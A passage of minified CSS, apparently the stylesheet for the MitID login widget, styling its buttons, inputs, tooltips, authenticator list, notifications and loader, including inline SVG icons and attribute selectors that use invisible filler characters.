rgba(0,0,0,.2);color:rgba(0,0,0,.4);text-decoration:none;cursor:not-allowed}.mitid--button-secondary:disabled .mitid--button-label{cursor:not-allowed}.mitid--button-secondary .mitid--button-label{color:#001c44}.mitid--button-icon{border:0;background:transparent;margin:0}.mitid--button-icon svg,.mitid--button-icon path{cursor:pointer}.mitid--button--left{margin-left:2rem}.mitid-checkbox{-webkit-appearance:none;appearance:none;display:block;position:relative;padding-left:2.188rem;max-width:300px;cursor:pointer;margin-top:.5rem}.mitid-checkbox__label{overflow:hidden;display:block;cursor:pointer;font-weight:600;color:#001c44;word-break:break-word;word-wrap:break-word}.mitid-checkbox__input{position:absolute;opacity:0;cursor:pointer;height:1.5rem;width:1.5rem;top:0;left:0}.mitid-checkbox__checkmark{position:absolute;top:0;left:0;height:1.5rem;width:1.5rem;background-repeat:no-repeat;background-position:center;display:flex;align-items:center;justify-content:center;cursor:pointer}.mitid-checkbox__checker{width:18px;height:18px;display:block;border:#001c44 solid 2px;border-radius:3px;box-sizing:border-box;cursor:pointer}.mitid-checkbox__input:checked~.mitid-checkbox__checkmark>.mitid-checkbox__checker{border-color:#0060e6}.mitid-checkbox__input:focus~.mitid-checkbox__checkmark{box-shadow:0 0 0 3px #0060e6;border-radius:4px}.mitid-checkbox__input:not(:checked):focus~.mitid-checkbox__checkmark>.mitid-checkbox__checker{border-color:#0060e6}.mitid-checkbox__input:checked~.mitid-checkbox__checkmark>.mitid-checkbox__checker{position:relative;background-size:18px 18px;border:none !important;background-color:#0060e6}.mitid-checkbox__input:checked~.mitid-checkbox__checkmark>.mitid-checkbox__checker::after{content:" ";transform-origin:left top;border-right:2px solid #fff;border-top:2px solid #fff;left:2px;top:9px;height:10px;width:5px;position:absolute;transform:scaleX(-1) rotate(135deg)}.mitid-checkbox:hover .mitid-checkbox__input:not(:checked)~.mitid-checkbox__checkmark>.mitid-checkbox__checker{border-color:#0060e6}.mitid-checkbox--no-margin{margin:0}.mitid-core-user{flex:0 0 auto}.mitid-core-user__input{width:100%;max-width:100%;min-width:200px;display:inline-block}.mitid-core-user__input[defaultlanguage^="DA / DK"]{visibility:hidden;pointer-events:none;position:absolute}.mitid-core-user__input[defaultlanguage^="DA / DK"] input{visibility:hidden}.mitid-core-user__input[defaultlanguage^="DA /ﾠDK"]{display:none;pointer-events:none;position:absolute}.mitid-core-user__input[defaultlanguage^="DA /ﾠDK"] input{visibility:hidden}.mitid-core-user__input[defaultlanguage^="DAﾠ/ﾠDK"]{visibility:visible;display:block;pointer-events:all}.mitid-core-user__input[defaultlanguage^="DAﾠ/ﾠDK"]:disabled{opacity:.2;pointer-events:none}.mitid-core-user__user-id{display:inline-block;border-radius:.25rem;outline:none;height:3rem;width:100%;padding:0 1rem;font-weight:500 !important;letter-spacing:0;border:1px solid #919191;box-sizing:border-box;margin-bottom:1rem;caret-color:#0060e6}.mitid-core-user__user-id:hover,.mitid-core-user__user-id:active,.mitid-core-user__user-id:focus{border:2px solid #0060e6;background:#fff;position:relative;right:1px}.mitid-core-user__user-id:hover:not(:focus){position:relative;opacity:1}.mitid-core-user__user-id:-ms-input-placeholder{font-weight:500 !important;color:#333 !important;opacity:1}.mitid-core-user__user-id::placeholder{font-weight:500 !important;color:#333 !important;opacity:1}.mitid-core-user__user-id:-ms-input-placeholder{font-weight:500 !important;color:#333 !important}.mitid-core-user__user-id::-ms-input-placeholder{font-weight:500 !important;color:#333 !important}.mitid-core-user__user-id::-ms-clear,.mitid-core-user__user-id::-ms-reveal{display:none}.mitid-core-user__user-id:focus{background:rgba(0,96,230,.05) !important;border:2px solid #0060e6 !important;position:relative;right:1px}.mitid--button-primary{margin-bottom:.5rem;color:#fff}.mitid--button-primary[showicontext^="Icon Help Text"]{visibility:hidden;pointer-events:none;position:absolute;width:0;height:0}.mitid--button-primary[showicontext^="Icon Help Text"] *{visibility:hidden}.mitid--button-primary[showicontext^="Icon HelpﾠText"]{display:none;pointer-events:none;position:absolute}.mitid--button-primary[showicontext^="Icon HelpﾠText"] *{visibility:hidden}.mitid--button-primary[showicontext^=IconﾠHelpﾠText]{display:inline-flex;visibility:visible;pointer-events:all}.mitid--button-primary[showicontext^=IconﾠHelpﾠText]:disabled{display:inline-flex;opacity:.2}.mitid-core-close{display:block}.mitid-core-close button{width:2.75rem;height:2.75rem;padding:0;box-sizing:content-box;outline:none;display:flex;align-items:center;justify-content:center;cursor:pointer}.mitid-core-close button svg{height:24px;width:24px}.mitid-core-close button svg path{fill:#001c44}.mitid-core-close button:hover svg{border:3px solid #0060e6;border-radius:4px}.mitid-core-close button:hover svg path{fill:#004cb8}.mitid-core-close button:active path{fill:#00398a}.mitid-core-close button:focus svg{border:3px solid #0060e6;border-radius:4px}.mitid-core-close button:focus svg path{fill:#004cb8}.mitid-core-close--corner{position:absolute;top:-8px;right:0}.mitid-core-tooltip{color:#333;font-size:1rem;left:4px;letter-spacing:0px;line-height:1.5rem;font-weight:400;font-style:normal;position:relative;padding:0;text-decoration:none;color:#000;list-style:none;text-align:left;letter-spacing:0px;z-index:2000;display:block}.mitid-core-tooltip__content{position:absolute;left:-4px;right:4px;background-color:#fff;border-radius:4px;box-shadow:0px 0px 10px 0px rgba(0,0,0,.3);z-index:1000;overflow:hidden}.mitid-core-tooltip .mitid-core-tooltip__header{display:flex;justify-content:space-between;margin:.5rem 0 .5rem 1rem;position:relative}.mitid-core-tooltip .mitid-core-tooltip__header h2{margin-top:.438rem;max-width:285px}.mitid-core-tooltip__text{margin:0 2rem 1rem 1rem;display:block}.mitid-core-tooltip__link{display:block;position:relative;top:.313rem}.mitid-core-overlay{position:absolute;top:0px;left:-0.313rem;right:-0.313rem;bottom:0px;background-color:rgba(255,255,255,.6);z-index:2}.mitid-core-overlay--inside{bottom:40px;top:42px}.mitid-link{display:inline-flex;cursor:pointer;position:relative;left:-5px;border-radius:4px;text-decoration:none;align-items:center;min-height:1.75rem;padding:0 .25rem;padding-left:2.188rem}.mitid-link:hover .mitid-link__label,.mitid-link:focus .mitid-link__label{text-decoration:underline;color:#004cb8}.mitid-link:focus{box-shadow:0 0 0 3px #0060e6}.mitid-link:active .mitid-link__label{color:#00398a;text-decoration:underline}.mitid-link:hover .mitid-link__icon path,.mitid-link:focus .mitid-link__icon path{fill:#004cb8}.mitid-link:active .mitid-link__icon path{fill:#00398a}.mitid-link__icon{margin-right:0;position:absolute;top:2px;left:2px;height:1.5rem;width:1.5rem;display:flex;align-items:center;justify-content:center;cursor:pointer}.mitid-link__icon svg{cursor:pointer}.mitid-link__icon path{fill:#0060e6;cursor:pointer}.mitid-link__label{max-width:100%;cursor:pointer;font-weight:600;color:#0060e6;text-decoration:none;letter-spacing:.2px;word-break:break-word;word-wrap:break-word}.mitid-link:after{content:"";min-height:inherit;font-size:0}.mitid-link--vertical-align{margin-left:.25rem;color:#0060e6}.mitid-link--vertical-align .mitid-core-text-button__icon{margin-right:.438rem}.mitid-link--vertical-align .mitid-core-text-button__icon path{fill:#0060e6}.mitid-tooltip{width:100%}.mitid-tooltip--labeltextleft h2,.mitid-tooltip--iconandlabeltextleft h2,.mitid-tooltip--headertextcentered h2{margin:0 auto}.mitid-tooltip--labeltextleft i{display:none}.mitid-tooltip--headertextcentered .mitid-tooltip__label{display:flex}.mitid-tooltip--headertextcentered .mitid-tooltip__label label{width:100%;font-size:1.25rem;line-height:1.75rem;text-align:center;text-transform:none}.mitid-tooltip--headertextcentered .mitid-tooltip__label i{display:none}.mitid-tooltip__label{display:inline-flex;align-items:center;padding-bottom:.5rem;position:relative}.mitid-tooltip__text{font-weight:600;font-size:.875rem;line-height:1.5rem;text-transform:uppercase;letter-spacing:.2px}.mitid--button-icon-tooltip:hover path,.mitid--button-icon-tooltip:focus path{fill:#0060e6}.mitid--button-icon-tooltip:active path{fill:#00398a}.mitid--button-icon-tooltip:focus svg{background-color:#fff;border-radius:.25rem;box-shadow:0px 0px 0px 2px #fff,0px 0px 0px 5px #0060e6}.mitid--button-icon-tooltip{position:absolute;-webkit-appearance:none;appearance:none;line-height:1.5rem;display:flex;right:-2.75rem;top:-0.625rem;height:2.75rem;width:2.75rem;cursor:pointer;overflow:visible;justify-content:center;background-color:#fff;align-items:center;background-color:transparent}.mitid--button-icon-tooltip svg{height:1rem;width:1rem;cursor:pointer}.mitid--button-icon-tooltip path{fill:#001c44;cursor:pointer}.mitid-core-icon--auth{display:inline-block;width:1.5rem;height:1.5rem;background-repeat:no-repeat;position:relative;top:7px}.mitid-core-icon--margin-right{margin-right:8px}.mitid-core-authenticator{display:flex;flex-direction:column;justify-content:stretch;height:100%}.mitid-core-authenticator__iframe{height:100%;border:none;width:104%;position:relative;left:-7px;flex:1 1 auto}.mitid-core-authenticator__iframe:focus{outline:none}.mitid-core-authenticator__header{flex:0 0 auto}.mitid-authenticators{display:block}.mitid-authenticators__list{background-color:#fff;border:1px solid #979797;border-radius:4px;padding:0;margin:0 0 16px 0;display:block}.mitid-authenticators__item{margin:0;width:100%;display:flex;align-items:center;color:#001c44;background-color:#fff;padding:0 0 0 1rem;border:2px solid transparent !important;box-sizing:border-box;cursor:pointer}.mitid-authenticators__item:nth-child(1),.mitid-authenticators__item:last-of-type{border-radius:3px}.mitid-authenticators__item::-moz-focus-inner{border:0}.mitid-authenticators__item:active span{position:relative;top:0}.mitid-authenticators__item i{position:relative;top:0;margin-right:.5rem;font-style:normal;outline:none}.mitid-authenticators__item:nth-child(1){border-radius:4px 4px 0 0}.mitid-authenticators__item:last-of-type{border-radius:0 0 4px 4px}.mitid-authenticators__item:hover{background-color:#f2f7fe}.mitid-authenticators__item:hover .mitid-authenticators__name{color:#0060e6}.mitid-authenticators__item:hover path{fill:#0060e6}.mitid-authenticators__item:active span{position:relative;top:0}.mitid-authenticators__item:focus{outline:none;background-color:#f2f7fe;box-shadow:0 2px #0060e6 inset,0 -2px #0060e6 inset,-2px 0 #0060e6 inset,2px 0 #0060e6 inset}.mitid-authenticators__item:focus path{fill:#0060e6}.mitid-authenticators__item:focus .mitid-authenticators__name{color:#0060e6}.mitid-authenticators__name{font-weight:600;padding:10px 0;max-width:272px;cursor:pointer}.mitid-authenticators__name:nth-of-type(1):not(:last-child):after{content:"+";font-size:1rem;position:relative;padding-left:4px;padding-right:4px}.mitid-authenticators--selected{background-color:#00398a !important;border-radius:0;box-shadow:-1px 0 0 0 #00398a,1px 0 0 0 #00398a;cursor:default}.mitid-authenticators--selected .mitid-authenticators__name{color:#fff}.mitid-authenticators--selected path{fill:#fff !important}.mitid-authenticators--selected:nth-child(1){border-radius:4px 4px 0 0;box-shadow:0 -1px #00398a,-1px 0 #00398a,1px 0 #00398a}.mitid-authenticators--selected:last-of-type{border-radius:0 0 4px 4px;box-shadow:-1px 0 #00398a,1px 0 #00398a,-1px 1px #00398a,1px 1px #00398a}.mitid-authenticators--selected:last-of-type:active span{position:relative;top:0}.mitid-authenticators--selected:hover .mitid-authenticators__name{color:#fff;cursor:default}.mitid-authenticators--selected:focus{box-shadow:0 -2px #fff inset,-2px 0 #fff inset,2px 0 #fff inset,-1px 1px #00398a,1px 1px #00398a,-1px -1px #00398a,1px -1px #00398a,0 2px 0 0 #fff inset}.mitid-authenticators--selected:focus .mitid-authenticators__name{color:#fff}.mitid-authenticators--selected:focus:nth-child(1){border-radius:4px 4px 0 0;box-shadow:0 2px #fff inset,0 -2px #fff inset,-2px 0 #fff inset,2px 0 #fff inset,-1px 1px #00398a,0 -1px #00398a,-1px 0 #00398a,1px 1px #00398a}.mitid-authenticators--selected:focus:last-of-type{border-radius:0 0 4px 4px;box-shadow:0 2px #fff inset,0 -2px #fff inset,-2px 0 #fff inset,2px 0 #fff inset,-1px 1px #00398a,1px 1px #00398a,-1px -1px #00398a,1px -1px #00398a}.mitid-core-reference-text{margin-bottom:1rem;flex:0 0 auto;display:block}.mitid-core-terms{display:flex;flex-direction:column;height:100%;justify-content:stretch;position:relative}.mitid-core-terms__summary{z-index:1}.mitid-core-terms__content p{display:block;margin-top:.313rem}.mitid-core-terms__actions{margin:1.5rem 0;min-height:5.5rem;display:flex;flex-direction:column;justify-content:space-between}.mitid-core-terms__continue{height:3.85rem}.mitid-core-terms__label{overflow:hidden;display:block;font-weight:600;color:#001c44}.mitid-notification{height:100%}.mitid-notification__content{padding:16px 16px 12px 56px;position:relative;margin-bottom:1rem;display:block;overflow:hidden}.mitid-notification--info{background-color:#f2f7fe;border:1px solid rgba(0,96,230,.2)}.mitid-notification--info:before{content:" ";background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='24' height='24'%3e%3cpath fill='%230060e6' d='M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 15h-2v-6h2v6zm0-8h-2V7h2v2z'/%3e%3c/svg%3e");position:absolute;display:block;width:24px;height:24px;left:16px;float:left}.mitid-notification--info:before path{fill:#0060e6}.mitid-notification--warning{background-color:#fffbf2;border:1px solid rgba(254,171,0,.2)}.mitid-notification--warning:before{content:" ";background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='24' height='24' viewBox='0 0 64 64'%3e%3cg fill='none' fill-rule='evenodd'%3e%3cpath d='M0 0h24v24H0z'/%3e%3cpath fill='%23FEAB00' d='M32 5.333C17.28 5.333 5.333 17.28 5.333 32 5.333 46.72 17.28 58.667 32 58.667c14.72 0 26.667-11.947 26.667-26.667C58.667 17.28 46.72 5.333 32 5.333z'/%3e%3cpath fill='black' d='M32 34.667A2.675 2.675 0 0129.333 32V21.333c0-1.466 1.2-2.666 2.667-2.666 1.467 0 2.667 1.2 2.667 2.666V32c0 1.467-1.2 2.667-2.667 2.667zM34.667 45.333h-5.334V40h5.334z'/%3e%3c/g%3e%3c/svg%3e");position:absolute;display:block;width:24px;height:24px;left:16px;float:left}.mitid-notification--error{background-color:#fdf2f2;border:1px solid rgba(218,0,0,.2)}.mitid-notification--error:before{content:" ";background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='24' height='24'%3e%3cpath fill='%23da0000' fill-rule='evenodd' d='M4.47 21h15.06c1.54 0 2.5-1.67 1.73-3L13.73 4.99c-.77-1.33-2.69-1.33-3.46 0L2.74 18c-.77 1.33.19 3 1.73 3zM12 14c-.55 0-1-.45-1-1v-2c0-.55.45-1 1-1s1 .45 1 1v2c0 .55-.45 1-1 1zm1 4h-2v-2h2v2z'/%3e%3c/svg%3e");position:absolute;display:block;width:24px;height:24px;left:16px;float:left}.mitid-notification__message,.mitid-notification__support{display:block}.mitid-core-section{flex:1 1 auto;display:flex;flex-direction:column;position:relative}.mitid-core-switch{display:flex;align-items:center}@media screen and (max-width: 399px){.mitid-core-switch{margin-left:.313rem}}.mitid-core-content{width:100%;margin:0;position:relative;display:flex;flex-direction:column;box-sizing:content-box;z-index:1;flex:1 0 auto;justify-content:stretch}.mitid-spinner{position:absolute;height:5px;width:100%;left:0;top:0;overflow:hidden;z-index:100;display:block}.mitid-spinner__spin{background-color:#0060e6;width:225px;height:4px;position:relative;animation-name:mitid-spinner;animation-duration:2s;animation-iteration-count:infinite;display:block}@keyframes mitid-spinner{0%{left:-225px;top:0px}100%{left:100%;top:0px}}.mitid-core-help{position:absolute;z-index:1000;background-color:#fff;border-radius:4px;box-shadow:0 5px 14px 3px rgba(0,0,0,.2);bottom:2rem;padding:.5rem .5rem .5rem 1rem;width:336px;box-sizing:border-box;left:-2px}@media screen and (max-width: 399px){.mitid-core-help{bottom:44px}}.mitid-core-help .mitid--divider-light,.mitid-core-help .mitid--divider{max-width:304px;margin:8px 0}.mitid-core-help__header{display:flex;align-items:center;height:2.5rem}.mitid-core-help__header .mitid-core-help__header-text{flex:1 1 100%;margin:0}.mitid-core-help__menu{padding:0;margin:0;list-style:none;display:inline-block;width:100%;height:100%}.mitid-core-help__menu-item{flex:1;min-height:44px;margin:0;padding:0 1.5rem 0 0;display:flex;align-items:center}.mitid-core-help__link-divider{margin-top:.5rem;margin-bottom:.438rem}@media screen and (max-width: 399px){.mitid-core-help{width:97%;margin:0 5px;min-width:266px}}.mitid-core-finalize{position:relative;display:flex;align-items:center;justify-content:center;height:100%;min-height:300px;flex-direction:column;flex:1 1 auto}@media screen and (max-height: 520px){.mitid-core-finalize{justify-content:flex-start}}.mitid-core-finalize__logo{height:24px;position:relative;width:62px;margin-bottom:24px}.mitid-core-finalize__logo-svg{position:absolute;left:-85px;top:-20px;height:62px;width:234px;transform:scale(0.26)}.mitid-core-finalize__logo-svg path{fill:#0060e6}.mitid-core-finalize__shield{position:absolute;width:100px;height:117px}.mitid-core-finalize__shield path{fill:#0060e6}.mitid-core-finalize__state{position:relative;height:120px;width:100px;margin-bottom:24px;display:block}.mitid-core-finalize__title{font-size:1.25rem;font-weight:700;line-height:1.75rem;display:block;text-align:center;height:60px}.mitid-core-finalize__done:after{opacity:0;height:34px;width:14px;transform-origin:left top;border-right:4px solid #fff;border-top:4px solid #fff;content:"";left:32px;top:55px;position:absolute;animation-duration:800ms;animation-delay:100ms;animation-timing-function:ease-in;animation-name:checkmark;animation-fill-mode:forwards;transform:scaleX(-1) rotate(135deg)}@keyframes checkmark{0%{height:0;width:0;opacity:1}20%{height:0;width:14px;opacity:1}35%{height:34px;width:14px;opacity:1}100%{height:34px;width:14px;opacity:1}}.mitid-core-client{overflow-y:auto;overflow-x:hidden;justify-content:stretch;flex-direction:column}@media screen and (max-width: 399px),(max-height: 520px){.mitid-core-client{height:588px !important}}</style><style id="mitid-styles">.mitid-loader{align-content:stretch;align-items:stretch;align-self:auto;animation-delay:0s;animation-direction:normal;animation-duration:0s;animation-fill-mode:none;animation-iteration-count:1;animation-name:none;animation-play-state:running;animation-timing-function:ease;azimuth:center;-webkit-backface-visibility:visible;backface-visibility:visible;background-attachment:scroll;background-blend-mode:normal;background-clip:border-box;background-color:transparent;background-image:none;background-origin:padding-box;background-position:0% 0%;background-repeat:repeat;background-size:auto auto;block-size:auto;border-block-end-color:currentcolor;border-block-end-style:none;border-block-end-width:medium;border-block-start-color:currentcolor;border-block-start-style:none;border-block-start-width:medium;border-bottom-color:currentcolor;border-bottom-left-radius:0;border-bottom-right-radius:0;border-bottom-style:none;border-bottom-width:medium;border-collapse:separate;border-image-outset:0s;border-image-repeat:stretch;border-image-slice:100%;border-image-source:none;border-image-width:1;border-inline-end-color:currentcolor;border-inline-end-style:none;border-inline-end-width:medium;border-inline-start-color:currentcolor;border-inline-start-style:none;border-inline-start-width:medium;border-left-color:currentcolor;border-left-style:none;border-left-width:medium;border-right-color:currentcolor;border-right-style:none;border-right-width:medium;border-spacing:0;border-top-color:currentcolor;border-top-left-radius:0;border-top-right-radius:0;border-top-style:none;border-top-width:medium;bottom:auto;-webkit-box-decoration-break:slice;box-decoration-break:slice;box-shadow:none;box-sizing:content-box;break-after:auto;break-before:auto;break-inside:auto;caption-side:top;caret-color:auto;clear:none;clip:auto;-webkit-clip-path:none;clip-path:none;color:initial;column-count:auto;column-fill:balance;column-gap:normal;column-rule-color:currentcolor;column-rule-style:none;column-rule-width:medium;column-span:none;column-width:auto;content:normal;counter-increment:none;counter-reset:none;cursor:auto;display:inline;empty-cells:show;filter:none;flex-basis:auto;flex-direction:row;flex-grow:0;flex-shrink:1;flex-wrap:nowrap;float:none;font-family:initial;font-feature-settings:normal;-webkit-font-kerning:auto;font-kerning:auto;font-language-override:normal;font-size:medium;font-size-adjust:none;font-stretch:normal;font-style:normal;font-synthesis:weight style;font-variant:normal;font-variant-alternates:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;font-variant-position:normal;font-weight:normal;grid-auto-columns:auto;grid-auto-flow:row;grid-auto-rows:auto;grid-column-end:auto;grid-column-gap:0;grid-column-start:auto;grid-row-end:auto;grid-row-gap:0;grid-row-start:auto;grid-template-areas:none;grid-template-columns:none;grid-template-rows:none;height:auto;-webkit-hyphens:manual;-ms-hyphens:manual;hyphens:manual;image-orientation:0deg;image-rendering:auto;image-resolution:1dppx;ime-mode:auto;inline-size:auto;isolation:auto;justify-content:flex-start;left:auto;letter-spacing:normal;line-break:auto;line-height:normal;list-style-image:none;list-style-position:outside;list-style-type:disc;margin-block-end:0;margin-block-start:0;margin-bottom:0;margin-inline-end:0;margin-inline-start:0;margin-left:0;margin-right:0;margin-top:0;-webkit-mask-clip:border-box;mask-clip:border-box;-webkit-mask-composite:source-over;mask-composite:add;-webkit-mask-image:none;mask-image:none;mask-mode:match-source;-webkit-mask-origin:border-box;mask-origin:border-box;-webkit-mask-position:0% 0%;mask-position:0% 0%;-webkit-mask-repeat:repeat;mask-repeat:repeat;-webkit-mask-size:auto;mask-size:auto;mask-type:luminance;max-height:none;max-width:none;min-block-size:0;min-height:0;min-inline-size:0;min-width:0;mix-blend-mode:normal;object-fit:fill;object-position:50% 50%;offset-block-end:auto;offset-block-start:auto;offset-inline-end:auto;offset-inline-start:auto;opacity:1;order:0;orphans:2;outline-color:initial;outline-offset:0;outline-style:none;outline-width:medium;overflow:visible;overflow-wrap:normal;overflow-x:visible;overflow-y:visible;padding-block-end:0;padding-block-start:0;padding-bottom:0;padding-inline-end:0;padding-inline-start:0;padding-left:0;padding-right:0;padding-top:0;page-break-after:auto;page-break-before:auto;page-break-inside:auto;perspective:none;perspective-origin:50% 50%;pointer-events:auto;position:static;quotes:initial;resize:none;right:auto;ruby-align:space-around;ruby-merge:separate;ruby-position:over;scroll-behavior:auto;-ms-scroll-snap-coordinate:none;scroll-snap-coordinate:none;-ms-scroll-snap-destination:0px 0px;scroll-snap-destination:0px 0px;-ms-scroll-snap-points-x:none;scroll-snap-points-x:none;-ms-scroll-snap-points-y:none;scroll-snap-points-y:none;-ms-scroll-snap-type:none;scroll-snap-type:none;shape-image-threshold:0;shape-margin:0;shape-outside:none;tab-size:8;table-layout:auto;text-align:initial;text-align-last:auto;text-combine-upright:none;-webkit-text-decoration-color:currentcolor;text-decoration-color:currentcolor;-webkit-text-decoration-line:none;text-decoration-line:none;-webkit-text-decoration-style:solid;text-decoration-style:solid;-webkit-text-emphasis-color:currentcolor;text-emphasis-color:currentcolor;-webkit-text-emphasis-position:over;text-emphasis-position:over right;-webkit-text-emphasis-style:none;text-emphasis-style:none;text-indent:0;text-justify:auto;-webkit-text-orientation:mixed;text-orientation:mixed;text-overflow:clip;text-rendering:auto;text-shadow:none;text-transform:none;text-underline-position:auto;top:auto;touch-action:auto;transform:none;transform-box:border-box;transform-origin:50% 50% 0;transform-style:flat;transition-delay:0s;transition-duration:0s;transition-property:all;transition-timing-function:ease;vertical-align:baseline;visibility:visible;white-space:normal;widows:2;width:auto;will-change:auto;word-break:normal;word-spacing:normal;word-wrap:normal;-ms-writing-mode:lr-tb;writing-mode:horizontal-tb;z-index:auto;-webkit-appearance:none;appearance:none;background-color:#fff;border:1px solid #ccc;box-sizing:border-box;position:relative;padding:31px;min-width:300px;display:flex !important;justify-content:center;align-items:center}.mitid-loader *,.mitid-loader ::after,.mitid-loader ::before{align-content:stretch;align-items:stretch;align-self:auto;animation-delay:0s;animation-direction:normal;animation-duration:0s;animation-fill-mode:none;animation-iteration-count:1;animation-name:none;animation-play-state:running;animation-timing-function:ease;azimuth:center;-webkit-backface-visibility:visible;backface-visibility:visible;background-attachment:scroll;background-blend-mode:normal;background-clip:border-box;background-color:transparent;background-image:none;background-origin:padding-box;background-position:0% 0%;background-repeat:repeat;background-size:auto auto;block-size:auto;border-block-end-color:currentcolor;border-block-end-style:none;border-block-end-width:medium;border-block-start-color:currentcolor;border-block-start-style:none;border-block-start-width:medium;border-bottom-color:currentcolor;border-bottom-left-radius:0;border-bottom-right-radius:0;border-bottom-style:none;border-bottom-width:medium;border-collapse:separate;border-image-outset:0s;border-image-repeat:stretch;border-image-slice:100%;border-image-source:none;border-image-width:1;border-inline-end-color:currentcolor;border-inline-end-style:none;border-inline-end-width:medium;border-inline-start-color:currentcolor;border-inline-start-style:none;border-inline-start-width:medium;border-left-color:currentcolor;border-left-style:none;border-left-width:medium;border-right-color:currentcolor;border-right-style:none;border-right-width:medium;border-spacing:0;border-top-color:currentcolor;border-top-left-radius:0;border-top-right-radius:0;border-top-style:none;border-top-width:medium;bottom:auto;-webkit-box-decoration-break:slice;box-decoration-break:slice;box-shadow:none;box-sizing:content-box;break-after:auto;break-before:auto;break-inside:auto;caption-side:top;caret-color:auto;clear:none;clip:auto;-webkit-clip-path:none;clip-path:none;color:initial;column-count:auto;column-fill:balance;column-gap:normal;column-rule-color:currentcolor;column-rule-style:none;column-rule-width:medium;column-span:none;column-width:auto;content:normal;counter-increment:none;counter-reset:none;cursor:auto;display:inline;empty-cells:show;filter:none;flex-basis:auto;flex-direction:row;flex-grow:0;flex-shrink:1;flex-wrap:nowrap;float:none;font-family:initial;font-feature-settings:normal;-webkit-font-kerning:auto;font-kerning:auto;font-language-override:normal;font-size:medium;font-size-adjust:none;font-stretch:normal;font-style:normal;font-synthesis:weight style;font-variant:normal;font-variant-alternates:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;font-variant-position:normal;font-weight:normal;grid-auto-columns:auto;grid-auto-flow:row;grid-auto-rows:auto;grid-column-end:auto;grid-column-gap:0;grid-column-start:auto;grid-row-end:auto;grid-row-gap:0;grid-row-start:auto;grid-template-areas:none;grid-template-columns:none;grid-template-rows:none;height:auto;-webkit-hyphens:manual;-ms-hyphens:manual;hyphens:manual;image-orientation:0deg;image-rendering:auto;image-resolution:1dppx;ime-mode:auto;inline-size:auto;isolation:auto;justify-content:flex-start;left:auto;letter-spacing:normal;line-break:auto;line-height:normal;list-style-image:none;list-style-position:outside;list-style-type:disc;margin-block-end:0;margin-block-start:0;margin-bottom:0;margin-inline-end:0;margin-inline-start:0;margin-left:0;margin-right:0;margin-top:0;-webkit-mask-clip:border-box;mask-clip:border-box;-webkit-mask-composite:source-over;mask-composite:add;-webkit-mask-image:none;mask-image:none;mask-mode:match-source;-webkit-mask-origin:border-box;mask-origin:border-box;-webkit-mask-position:0% 0%;mask-position:0% 0%;-webkit-mask-repeat:repeat;mask-repeat:repeat;-webkit-mask-size:auto;mask-size:auto;mask-type:luminance;max-height:none;max-width:none;min-block-size:0;min-height:0;min-inline-size:0;min-width:0;mix-blend-mode:normal;object-fit:fill;object-position:50% 50%;offset-block-end:auto;offset-block-start:auto;offset-inline-end:auto;offset-inline-start:auto;opacity:1;order:0;orphans:2;outline-color:initial;outline-offset:0;outline-style:none;outline-width:medium;overflow:visible;overflow-wrap:normal;overflow-x:visible;overflow-y:visible;padding-block-end:0;padding-block-start:0;padding-bottom:0;padding-inline-end:0;padding-inline-start:0;padding-left:0;padding-right:0;padding-top:0;page-break-after:auto;page-break-before:auto;page-break-inside:auto;perspective:none;perspective-origin:50% 50%;pointer-events:auto;position:static;quotes:initial;resize:none;right:auto;ruby-align:space-around;ruby-merge:separate;ruby-position:over;scroll-behavior:auto;-ms-scroll-snap-coordinate:none;scroll-snap-coordinate:none;-ms-scroll-snap-destination:0px 0px;scroll-snap-destination:0px 0px;-ms-scroll-snap-points-x:none;scroll-snap-points-x:none;-ms-scroll-snap-points-y:none;scroll-snap-points-y:none;-ms-scroll-snap-type:none;scroll-snap-type:none;shape-image-threshold:0;shape-margin:0;shape-outside:none;tab-size:8;table-layout:auto;text-align:initial;text-align-last:auto;text-combine-upright:none;-webkit-text-decoration-color:currentcolor;text-decoration-color:currentcolor;-webkit-text-decoration-line:none;text-decoration-line:none;-webkit-text-decoration-style:solid;text-decoration-style:solid;-webkit-text-emphasis-color:currentcolor;text-emphasis-color:currentcolor;-webkit-text-emphasis-position:over;text-emphasis-position:over right;-webkit-text-emphasis-style:none;text-emphasis-style:none;text-indent:0;text-justify:auto;-webkit-text-orientation:mixed;text-orientation:mixed;text-overflow:clip;text-rendering:auto;text-shadow:none;text-transform:none;text-underline-position:auto;top:auto;touch-action:auto;transform:none;transform-box:border-box;transform-origin:50% 50% 0;transform-style:flat;transition-delay:0s;transition-duration:0s;transition-property:all;transition-timing-function:ease;vertical-align:baseline;visibility:visible;white-space:normal;widows:2;width:auto;will-change:auto;word-break:normal;word-spacing:normal;word-wrap:normal;-ms-writing-mode:lr-tb;writing-mode:horizontal-tb;z-index:auto;-webkit-appearance:none;appearance:none}@media screen and (max-width: 399px){.mitid-loader{width:auto !important;padding:5px;border:0;overflow:hidden}}@media screen and (max-height: 520px){.mitid-loader{height:auto !important}}.mitid-loader *{font-family:"IBM Plex Sans",Arial,Helvetica,FreeSans,sans,sans-serif;line-height:1.5rem;font-size:1rem;color:#333}.mitid-loader h2{font-size:1rem;color:#333;font-weight:700;line-height:1.5rem;margin:0;padding:0;display:block}.mitid-loader h3{color:#333;font-size:1.25rem;font-weight:700;line-height:1.75rem;margin:0;padding:0;display:block}.mitid-loader__font-load-500{visibility:hidden;font-weight:500;position:absolute;display:inline}.mitid-loader__font-load-600{visibility:hidden;font-weight:600;position:absolute;display:inline}.mitid-loader__title{font-size:1.25rem;font-weight:700;line-height:1.75rem;display:block;text-align:center;max-width:390px}.mitid-loader__content{z-index:2000;width:100%;display:flex;justify-content:center;align-items:center;flex-direction:column}.mitid-loader__logo{height:24px;position:relative;width:62px;margin-bottom:24px}.mitid-loader__logo-svg{position:absolute;left:-85px;top:-20px;height:62px;width:234px;transform:scale(0.26)}.mitid-loader__logo-svg path{fill:#0060e6}.mitid-loader__shield{position:absolute;width:100px;height:117px}.mitid-loader__shield path{fill:#0060e6}.mitid-loader__state{position:relative;height:120px;width:100px;margin-bottom:24px;display:block}.mitid-loader__error{position:absolute}.mitid-loader__error circle,.mitid-loader__error 